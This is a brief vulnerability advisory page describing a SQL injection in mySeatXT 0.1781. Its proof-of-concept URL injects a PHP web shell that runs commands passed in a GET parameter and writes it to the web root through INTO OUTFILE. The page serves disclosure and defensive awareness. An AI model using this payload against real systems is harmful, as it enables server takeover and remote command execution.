Home
Consulting
Advisories
Software
Articles
Contact

mySeatXT 0.1781 SQL Injection

Legacy Advisories

Description

A SQL injection vulnerability in mySeatXT 0.1781 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Proof Of Concept

http://localhost/myseat/web/classes/autocomplete.php?field='%3C?php%20system($_GET[%22CMD%22]);%20?%3E'%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23&term=


Copyright © 2018 AutoSec Tools LLC